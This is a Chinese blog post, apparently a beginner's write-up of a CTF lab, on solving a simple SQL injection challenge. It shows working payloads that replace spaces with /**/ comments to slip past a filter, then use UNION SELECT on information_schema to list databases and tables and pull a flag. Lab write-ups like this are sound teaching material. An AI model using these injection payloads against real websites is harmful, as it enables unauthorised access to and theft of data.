码迷,mamicode.com
首页 > 数据库 > 详细

4.简单的sql注入

时间:2017-07-15 09:58:54      阅读:275      评论:0      收藏:0      [点我收藏+]

标签:web安全   sql注入   ctf   实验吧   

根据页面提示,到底过滤了什么东西?可以知道一定过滤了什么....

    分别输入1,2,3有对应的结果

    技术分享

    使用‘会报错,于是

    构造常用的sql语句:1‘ and ‘1‘=‘1

    技术分享

    没有反应试一试1‘ and ‘1‘=‘2

    技术分享

    还是没反应,工具提示,应该是过滤了什么,改一下sql语句试一试

    1and1=1

    技术分享

    可以显示东西,经过判断过滤了空格,我们使用/**/来代替空格

    试一试1‘/**/and/**/‘1‘=‘1

    发现有结果了:

    于是构建sql语句:

    判断有那些数据库:                   

    1‘/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/‘1‘=‘1

    可以看到结果:

    技术分享

    查看有哪些数据表:

    1‘/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/‘1‘=‘1

    技术分享

    发现了flag的表,我们猜测应该是在web1数据库中并且字段就是flag(其实就在本页面的数据库中)

    故:

    1‘/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/‘1‘=‘1

    技术分享

本人也是初学者,参考了许多大佬的wp 自己写出来后有什么错误的地方,希望大家指出,谢谢!

本文出自 “11846238” 博客,请务必保留此出处http://11856238.blog.51cto.com/11846238/1947684

4.简单的sql注入

标签:web安全   sql注入   ctf   实验吧   

原文地址:http://11856238.blog.51cto.com/11846238/1947684

(0)
(1)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!